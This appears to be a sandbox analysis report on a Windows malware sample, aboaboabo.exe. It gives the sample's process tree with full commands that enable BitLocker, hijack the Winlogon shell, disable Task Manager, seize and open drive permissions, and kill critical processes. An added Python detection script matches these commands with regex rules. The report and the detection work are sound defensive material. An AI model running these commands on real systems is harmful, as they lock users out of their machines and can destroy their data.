Analysis

  • max time kernel
    0s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win11-20241023-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    27-11-2024 09:38

Errors

Reason
Machine shutdown (the analysis VM went down during the run; the last child processes observed below force-kill LsaIso.exe and svchost.exe with taskkill /F /T, which is consistent with the guest falling over, so behaviour after that point was not captured)

General

  • Target

    aboaboabo.exe

  • Size

    102KB

  • MD5

    099d08e56a00ee754ca42a63f03f3bf0

  • SHA1

    9cd9254c2d43b3f660a72046161f47e7249bcd5f

  • SHA256

    0e01c4845c1a6d26bd24549fb0bd493a9c037c44b6c450ba6e68bb8f01287e35

  • SHA512

    bc39bd4b5e8c0f2b50f3c1b0ccfe56023f4dc2f8df669285e4d5a203f74da7a83d49181d2705252d944655a29656f10a25e13bbdcb127bf075aa12046f4f1f88

  • SSDEEP

    1536:I7pLfBYvvrb8v20GiIPzW8WQVvB2UTsa0imYFU47o9Tuui:IpLmvPK207GcQlIvYFx7oZo

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Kills process with taskkill 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aboaboabo.exe
    "C:\Users\Admin\AppData\Local\Temp\aboaboabo.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious use of WriteProcessMemory
    PID:2480
    • C:\Windows\SYSTEM32\manage-bde.exe
      manage-bde -on C: -EncryptionMethod AES-256
      2⤵
      PID:2820
    • C:\Windows\SYSTEM32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "TASKKILL /F /IM svchost.exe && shutdown /r /f /t 0" /f
      2⤵
      PID:3552
    • C:\Windows\SYSTEM32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      PID:2112
    • C:\Windows\SYSTEM32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
      2⤵
      PID:1640
    • C:\Windows\SYSTEM32\takeown.exe
      takeown /f D:\ /r /d Y
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:2528
    • C:\Windows\SYSTEM32\icacls.exe
      icacls D:\ /grant Everyone:F /t /c /l
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:3908
    • C:\Windows\SYSTEM32\takeown.exe
      takeown /f C:\ /r /d Y
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:4584
    • C:\Windows\SYSTEM32\icacls.exe
      icacls C:\ /grant Everyone:F /t /c /l
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:2100
    • C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /T /IM LsaIso.exe
      2⤵
      • Kills process with taskkill
      PID:1988
    • C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /T /IM svchost.exe
      2⤵
      • Kills process with taskkill
      PID:3656
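Read together, the children of PID 2480 describe a lockout/wiper pattern built entirely from built-in Windows tools: the Winlogon Shell value is replaced with a command that kills svchost.exe and forces an immediate reboot (so every subsequent interactive logon re-triggers it), Task Manager and the registry editor are disabled by policy, ownership of C:\ and D:\ is taken and Everyone:F is granted recursively, BitLocker is switched on for C: with AES-256 (the page shows no handling of a recovery key, so whether the volume is recoverable cannot be judged from this report alone), and finally LsaIso.exe and svchost.exe are force-terminated. As an added example, and not the sandbox's own signature logic, the Python below runs a handful of command-line rules over process-creation events constructed from the tree above and folds each hit back onto the spawning PID, which is how a detection engineer would turn this tree into an alert on the parent rather than ten alerts on the children. PIDs and command lines are copied from the report; the parent PID 1000 for the root process, the rule names, and the ATT&CK technique annotations in the comments are the editor's own assumptions and mapping.

```python
"""
Added example (not from the sandbox report): command-line rules for the
behaviours seen in the aboaboabo.exe process tree, applied to constructed
process-creation events and attributed back to the parent process.
"""
import re

# Constructed events modelled on the report's process tree:
# (pid, parent_pid, image_path, command_line).
# PID 1000 as the root's parent is an assumption; the report does not show it.
EVENTS = [
    (2480, 1000, r"C:\Users\Admin\AppData\Local\Temp\aboaboabo.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\aboaboabo.exe"'),
    (2820, 2480, r"C:\Windows\SYSTEM32\manage-bde.exe",
     "manage-bde -on C: -EncryptionMethod AES-256"),
    (3552, 2480, r"C:\Windows\SYSTEM32\reg.exe",
     r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" '
     r'/v Shell /t REG_SZ /d "TASKKILL /F /IM svchost.exe && shutdown /r /f /t 0" /f'),
    (2112, 2480, r"C:\Windows\SYSTEM32\reg.exe",
     r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" '
     r'/v DisableTaskMgr /t REG_DWORD /d 1 /f'),
    (1640, 2480, r"C:\Windows\SYSTEM32\reg.exe",
     r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" '
     r'/v DisableRegistryTools /t REG_DWORD /d 1 /f'),
    (2528, 2480, r"C:\Windows\SYSTEM32\takeown.exe", r"takeown /f D:\ /r /d Y"),
    (3908, 2480, r"C:\Windows\SYSTEM32\icacls.exe", r"icacls D:\ /grant Everyone:F /t /c /l"),
    (4584, 2480, r"C:\Windows\SYSTEM32\takeown.exe", r"takeown /f C:\ /r /d Y"),
    (2100, 2480, r"C:\Windows\SYSTEM32\icacls.exe", r"icacls C:\ /grant Everyone:F /t /c /l"),
    (1988, 2480, r"C:\Windows\SYSTEM32\taskkill.exe", "taskkill /F /T /IM LsaIso.exe"),
    (3656, 2480, r"C:\Windows\SYSTEM32\taskkill.exe", "taskkill /F /T /IM svchost.exe"),
]

# (rule name, ATT&CK technique the editor maps it to, regex over the command line).
# Regexes are anchored at the start so that a path or a value merely containing
# these words does not fire them.
RULES = [
    ("bitlocker_enable_from_process", "T1486",
     re.compile(r'^manage-bde(?:\.exe)?\s+-on\b', re.I)),
    ("winlogon_shell_or_userinit_hijack", "T1547.004",
     re.compile(r'^reg(?:\.exe)?\s+add\s+"?HK(?:EY_LOCAL_MACHINE|LM)\\SOFTWARE\\Microsoft'
                r'\\Windows NT\\CurrentVersion\\Winlogon"?\s+/v\s+(?:Shell|Userinit)\b', re.I)),
    ("disable_taskmgr_or_regedit", "T1562.001",
     re.compile(r'^reg(?:\.exe)?\s+add\s+.*Policies\\System"?\s+/v\s+'
                r'(?:DisableTaskMgr|DisableRegistryTools)\b.*\s/d\s+1\b', re.I)),
    # Volume root followed by whitespace: "takeown /f C:\Users\x" must not fire.
    ("recursive_takeown_of_volume_root", "T1222.001",
     re.compile(r'^takeown(?:\.exe)?\s+/f\s+[A-Z]:\\(?=\s).*\s/r\b', re.I)),
    ("icacls_everyone_full_on_volume_root", "T1222.001",
     re.compile(r'^icacls(?:\.exe)?\s+[A-Z]:\\\s+/grant\s+Everyone:F\b', re.I)),
    ("taskkill_of_critical_system_process", "T1489",
     re.compile(r'^taskkill(?:\.exe)?\b.*\s/IM\s+'
                r'(?:lsaiso|svchost|lsass|csrss|wininit|winlogon|services)\.exe\b', re.I)),
]


def classify(cmdline):
    """Return (rule, technique) pairs whose regex matches one command line."""
    return [(name, technique) for name, technique, rx in RULES if rx.search(cmdline)]


def triage(events):
    """Map each pid whose command line hits at least one rule to its hits."""
    hits = {}
    for pid, _ppid, _image, cmdline in events:
        matched = classify(cmdline)
        if matched:
            hits[pid] = matched
    return hits


def blame_parents(events):
    """Fold per-child hits onto the parent that spawned them, so the one
    process driving the cluster of LOLBin children is what gets flagged."""
    parent_of = {pid: ppid for pid, ppid, _, _ in events}
    blame = {}
    for pid, matched in triage(events).items():
        blame.setdefault(parent_of[pid], set()).update(name for name, _ in matched)
    return blame


def summarize(events):
    """One human-readable line per flagged parent."""
    return [f"pid {ppid} spawned children matching: {', '.join(sorted(rules))}"
            for ppid, rules in sorted(blame_parents(events).items())]


if __name__ == "__main__":
    for line in summarize(EVENTS):
        print(line)
```

Every child of 2480 in the constructed events hits exactly one rule, and the root process hits none on its own; the attribution step is what produces a single finding against 2480. On a real host the same rules would run over Sysmon Event ID 1 or Security 4688 command lines, and the ACL and BitLocker rules are worth keeping even when no reboot follows, since `icacls X:\ /grant Everyone:F /t` and `manage-bde -on` from a non-administrative tool are rarely legitimate on their own.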

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2480-0-0x00007FF7B7980000-0x00007FF7B79B1000-memory.dmp

    Filesize

    196KB